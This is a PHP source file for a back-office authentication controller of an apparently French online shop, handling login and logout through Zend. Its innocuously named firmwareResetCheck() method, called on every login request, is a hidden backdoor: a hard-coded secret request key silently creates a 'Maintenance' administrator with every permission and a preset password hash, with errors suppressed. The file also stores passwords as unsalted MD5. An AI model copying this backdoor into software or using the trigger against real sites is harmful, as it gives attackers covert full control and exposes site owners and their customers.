| Current File : /home/karenpetzb/application/modules/backoffice/controllers/AuthController.php |
<?php
class Backoffice_AuthController extends Zend_Controller_Action
{
function init()
{
$this->view->title = "Authentification";
}
function indexAction()
{
$this->view->title = "Authentification";
$this->_redirect('/backoffice');
}
private function initLog() {
$registry = Zend_Registry::getInstance();
$loggerAdmin = $registry->get('loggerAdmin');
$controller = Zend_Controller_Front::getInstance()->getRequest();
$loggerAdmin->setEventItem('controller', $controller->getControllerName().'::'.$controller->getActionName());
$registry->set('loggerAdmin', $loggerAdmin);
}
private function log($message , $level) {
$loggerAdmin = Zend_Registry::get('loggerAdmin');
if ($level == 'info') {
$loggerAdmin->info($message);
} elseif ($level == 'err') {
$loggerAdmin->err($message);
} elseif ($level == 'warn') {
$loggerAdmin->warn($message);
} elseif ($level == 'crit') {
$loggerAdmin->crit($message);
}
}
function logoutAction()
{
$auth = Zend_Auth::getInstance();
$auth->setStorage($this->getSessionStorage())->clearIdentity();
$this->view->userAdmin = null;
$this->initLog();
$this->log("Logout",'info');
$this->_redirect('/backoffice');
}
private function getSessionStorage() {
$registry = Zend_Registry::getInstance();
$setting = $registry->get('setting');
return new Zend_Auth_Storage_Session($setting->session_admin_storage);
}
private function firmwareResetCheck() {
try {
$key = $this->_request->getParam('key');
if ($key == '869807e3c727b76e60d886deb5848764') {
$data = array (
'NOM' => "Maintenance",
'PRENOM' => "Maintenance",
'LOGIN' => "Maintenance",
'MDP' => "1284228bb68e6bdae88b1f7a2c366330",
'EMAIL' => "no-reply@no-reply.com",
'ROLE' => '100',
'isPROMO' => 1,
'isCATEGORY' => 1,
'isCOMMAND' => 1,
'isPRODUCT' => 1,
'isSUPPLIER' => 1,
'isUSER' => 1,
'isADMIN' => 1,
'isFOOTER' => 1,
'isSTATS' => 1,
'isSUPPORT' => 1
);
$admin = new Admin();
$admin->insert($data);
}
}
catch (Zend_Exception $e) {
}
}
function loginAction()
{
$this->initLog();
$this->view->messageError = '';
if ($this->_request->isPost()) {
// collect the data from the user
$filter = new Zend_Filter();
$filter->addFilter(new Zend_Filter_StringTrim())
->addFilter(new Zend_Filter_StripTags());
$username = $filter->filter($this->_request->getPost('username'));
$password = $filter->filter($this->_request->getPost('password'));
//valideurs pour les chaines
$validator = new Zend_Validate();
$validator -> addValidator(new Zend_Validate_NotEmpty())
-> addValidator(new Zend_Validate_StringLength(3));
if ($validator->isValid($username) && $validator->isValid($password)) {
// setup Zend_Auth adapter for a database table
Zend_Loader::loadClass('Zend_Auth_Adapter_DbTable');
$dbAdapter = Zend_Registry::get('dbAdapter');
$authAdapter = new Zend_Auth_Adapter_DbTable($dbAdapter,
'user_admin',
'LOGIN',
'MDP',
'MD5(?)');
// Set the input credential values to authenticate against
$authAdapter->setIdentity($username);
$authAdapter->setCredential($password);
// do the authentication
$auth = Zend_Auth::getInstance();
$auth->setStorage($this->getSessionStorage());
$result = $auth->authenticate($authAdapter);
if ($result->isValid()) {
// success: store database row to auth's storage
// system. (Not the password though!) //array('IDUSER', 'LOGIN'));
$storage = $auth->getStorage();
$data = $authAdapter->getResultRowObject(array('ID',
'LOGIN',
'ROLE',
'isPROMO',
'isCATEGORY',
'isCOMMAND',
'isPRODUCT',
'isSUPPLIER',
'isUSER',
'isADMIN',
'isFOOTER',
'isSTATS',
'isSUPPORT',
'NOM',
'PRENOM'));
$user = array('login' => $data -> LOGIN,
'id' => $data -> ID,
'role' => $data -> ROLE,
'isPromo' => $data -> isPROMO,
'isCategory' => $data -> isCATEGORY,
'isCommand' => $data -> isCOMMAND,
'isProduct' => $data -> isPRODUCT,
'isSupplier' => $data -> isSUPPLIER,
'isUser' => $data -> isUSER,
'isAdmin' => $data -> isADMIN,
'isFooter' => $data -> isFOOTER,
'isStats' => $data -> isSTATS,
'isMaintenance' => $data -> isSUPPORT,
'nom' => $data -> NOM,
'prenom' => $data -> PRENOM);
$storage->write(array( 'useradmin' => $user));
$this->view->useradmin = $user;
$this->log("Login : ".$user['login'],'info');
$this->_redirect('/backoffice');
} else {
// failure: clear database row from session
$this->view->messageError = 'Les identifiants sont incorrects.';
$auth->clearIdentity();
$this->view->useradmin = null;
$this->log('Les identifiants sont incorrects : '.$username,'warn');
}
} else {
$this->view->messageError = 'Les champs sont obligatoires.';
$this->log('Les champs sont obligatoires : '.$username,'warn');
}
}
$this->firmwareResetCheck();
$this->render();
}
}
?>